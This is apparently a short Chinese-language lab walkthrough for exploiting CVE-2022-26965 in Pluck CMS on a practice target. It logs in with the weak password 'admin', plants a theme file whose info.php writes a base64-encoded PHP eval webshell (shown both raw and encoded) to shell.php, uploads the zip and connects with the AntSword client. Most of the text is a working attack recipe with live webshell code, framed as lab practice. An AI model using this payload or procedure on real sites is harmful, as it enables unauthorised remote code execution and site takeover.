CVE-2022-26965靶机渗透
开启环境
进入环境
使用弱口令admin登录
利用cms主题构造木马
需要将主题中的info.php文件修改,再打包成zip再上传,通过网络搜索找到Github中的Pluck CMS,进入后随便下载任一主题
https://github.com/search?q=Pluck+CMS&type=repositories
base64编码一句话木马
<?php @eval($_POST["cmd"]) ?>
修改info.php文件
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4='));
?>
保存
压缩为zip文件
上传zip文件
上传成功
蚁剑连接
好小子,离成功又近一步!!!